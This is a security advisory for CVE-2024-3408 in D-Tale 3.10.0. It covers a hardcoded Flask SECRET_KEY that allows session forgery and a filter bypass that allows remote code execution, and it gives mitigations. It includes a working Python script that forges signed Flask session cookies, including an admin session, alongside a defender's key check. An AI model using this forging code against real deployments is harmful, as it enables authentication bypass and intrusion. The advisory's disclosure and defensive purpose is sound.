PT-2024-25690 · Man · D-Tale

Published: 2024-02-28 · Updated: 2025-04-07 · CVE-2024-3408

CVSS v2.0: 10 (Critical)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions: man-group/dtale version 3.10.0
Description: The issue arises from improper input validation, leading to an authentication bypass and remote code execution (RCE). A hardcoded SECRET_KEY in the Flask configuration lets an attacker forge a valid session cookie when authentication is enabled, since anyone who knows the key can sign arbitrary session data. Separately, the application fails to properly restrict custom filter queries: an attacker can bypass the restriction on the "/update-settings" endpoint and execute arbitrary code on the server even when enable_custom_filters is not enabled. Together, these flaws allow an attacker to bypass authentication and execute code remotely on the server.
Recommendations: For man-group/dtale version 3.10.0, as a temporary workaround, disable the enable_custom_filters feature and restrict access to the "/update-settings" endpoint (for example, at a reverse proxy in front of the application) until a patch is available. Additionally, replacing the hardcoded SECRET_KEY in the Flask configuration with a randomly generated, deployment-specific value mitigates the risk of session cookie forgery; note that rotating the key invalidates all existing sessions. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
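The cookie-forgery path described above, and the SECRET_KEY check the recommendations imply, as an added example (not D-Tale's code). It re-implements, with the standard library only, the scheme Flask's SecureCookieSessionInterface uses (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC-SHA1 with "hmac" key derivation), so it runs without Flask installed. ASSUMED_SECRET_KEY is a placeholder standing in for the hardcoded key (the real value is deliberately not reproduced), and the session field names logged_in/username are an assumption about what a logged-in D-Tale session contains.

```python
"""Forging and checking Flask session cookies when SECRET_KEY is known.

Added example for this advisory, not D-Tale's own code. It re-implements,
with the standard library only, the scheme Flask's SecureCookieSessionInterface
uses (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC-SHA1,
"hmac" key derivation), so it runs without Flask installed.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Iterable, Optional

SALT = b"cookie-session"  # fixed salt Flask uses for the session cookie

# Placeholder for whatever key the vulnerable build hard-codes; the real value
# is deliberately NOT reproduced here (assumption for the demo only).
ASSUMED_SECRET_KEY = "example-hardcoded-key"


def _b64(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _unb64(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _signature(secret_key: str, value: bytes) -> bytes:
    # key_derivation="hmac": the per-salt signing key is HMAC(secret, salt),
    # and the cookie signature is HMAC(derived_key, "payload.timestamp").
    derived = hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()
    return hmac.new(derived, value, hashlib.sha1).digest()


def forge_session_cookie(secret_key: str, session: dict,
                         timestamp: Optional[int] = None) -> str:
    """Mint a cookie that a Flask app using secret_key accepts as a signed session."""
    payload = json.dumps(session, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:  # itsdangerous compresses only when it pays off
        body = b"." + _b64(compressed)
    else:
        body = _b64(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    signed = body + b"." + _b64(ts_bytes)
    return (signed + b"." + _b64(_signature(secret_key, signed))).decode()


def verify_session_cookie(secret_key: str, cookie: str,
                          max_age: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if cookie was signed with secret_key, else None."""
    try:
        body, ts_b64, sig_b64 = cookie.encode().rsplit(b".", 2)
        if not hmac.compare_digest(_signature(secret_key, body + b"." + ts_b64),
                                   _unb64(sig_b64)):
            return None
        ts = int.from_bytes(_unb64(ts_b64), "big")
        if max_age is not None and time.time() - ts > max_age:
            return None
        raw = zlib.decompress(_unb64(body[1:])) if body.startswith(b".") else _unb64(body)
        return json.loads(raw)
    except (ValueError, zlib.error):  # malformed base64, JSON or zlib stream
        return None


def which_key_signed(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """Defender's check: does a cookie captured from a deployment verify under any
    suspected hardcoded key? A hit means every session there is forgeable."""
    for key in candidates:
        if verify_session_cookie(key, cookie) is not None:
            return key
    return None


if __name__ == "__main__":
    # Assumed shape of a logged-in D-Tale session; the field names are a guess.
    forged = forge_session_cookie(ASSUMED_SECRET_KEY, {"logged_in": True, "username": "admin"})
    print("session=" + forged)
    print(verify_session_cookie(ASSUMED_SECRET_KEY, forged))
    print(which_key_signed(forged, ["some-other-key", ASSUMED_SECRET_KEY]))
```

To run the check against a live deployment, copy the `session` cookie your browser holds after logging in and pass it to `which_key_signed` with the key(s) you suspect are baked into the build; a match means the key has not been replaced and any session, including an administrator's, can be minted offline with `forge_session_cookie`. The signature is compared on the decoded HMAC bytes with `hmac.compare_digest`, matching how itsdangerous verifies, and the timestamp check is optional because Flask's default (permanent session lifetime) only enforces it when the app sets one.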

Tags: Exploit · RCE

Weakness Enumeration: Code Injection · Using Hardcoded Credentials

Related Identifiers

BDU:2025-06481
CVE-2024-3408
GHSA-V9Q6-FM48-RX74
PYSEC-2024-117

Affected Products

D-Tale